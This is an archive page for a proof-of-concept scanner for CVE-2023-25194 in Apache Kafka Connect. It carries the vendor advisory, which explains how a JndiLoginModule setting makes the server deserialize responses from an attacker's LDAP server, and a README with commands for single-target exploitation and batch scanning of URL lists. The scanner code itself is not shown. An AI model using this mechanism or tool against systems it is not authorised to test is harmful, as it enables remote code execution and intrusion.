Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-25194 PoC — Apache Kafka Connect API: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration using Kafka

Source
https://github.com/YongYe-Security/CVE-2023-25194
Associated Vulnerability
Title:Apache Kafka Connect API: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration using Kafka Connect (CVE-2023-25194)
Description:A possible security vulnerability has been identified in Apache Kafka Connect API. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka Connect 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.
Description
CVE-2023-25194 Scan
Readme


This tool is intended for security testing purposes only. Do not engage in any illegal activities. Any consequences resulting from misuse are solely your responsibility.

The CVE-2023-25194 detection tool utilizes JNDI to load the response content returned by the DNS log platform to determine the presence of vulnerabilities. The logic for determining the response content involves successful utilization of the content received through testing. Some response contents can establish connections with the target via the DNS log platform, but they are ultimately ignored as they cannot be exploited.

```
python3 CVE-2023-25194_Scan.py -h

_______    ________    ___   ____ ___  _____      ___   _____________  __ __
  / ____/ |  / / ____/   |__ \ / __ \__ \|__  /     |__ \ / ____<  / __ \/ // /
 / /    | | / / __/________/ // / / /_/ / /_ <________/ //___ \ / / /_/ / // /_
/ /___  | |/ / /__/_____/ __// /_/ / __/___/ /_____/ __/____/ // /\__, /__  __/
\____/  |___/_____/    /____/\____/____/____/     /____/_____//_//____/  /_/

                                                    PowerBy:YongYe__Security

usage: CVE-2023-25194_Scan.py [-h] (-u URL | -f FILE)

Send POST requests to URLs

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL, Single target detection
  -f FILE, --file FILE  URL File, Batch scan

```

Single target exploitation

```
python3 CVE-2023-25194_Scan.py -u http://127.0.0.1:8080
```
![image](https://github.com/YongYe-Security/CVE-2023-25194/blob/main/1.png)

Batch target scanning

The URLs with vulnerabilities will be stored in the file "result.txt" in the current directory.

```
python3 CVE-2023-25194_Scan.py -f url.txt
```
![image](https://github.com/YongYe-Security/CVE-2023-25194/blob/main/3.png)

If necessary, you can modify the actual DNS log platform address in line 34 of the code. However, not changing it will not affect the program's execution.
File Snapshot

 [4.0K]  /data/pocs/98579a8b300fe13d0201d0d2a720c0d15ed46187
├── [ 10K]  1.png
├── [ 12K]  2.png
├── [589K]  3.png
├── [4.0K]  CVE-2023-25194_Scan.py
├── [1.9K]  README.md
└── [1.5K]  Readme-zh-cn.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →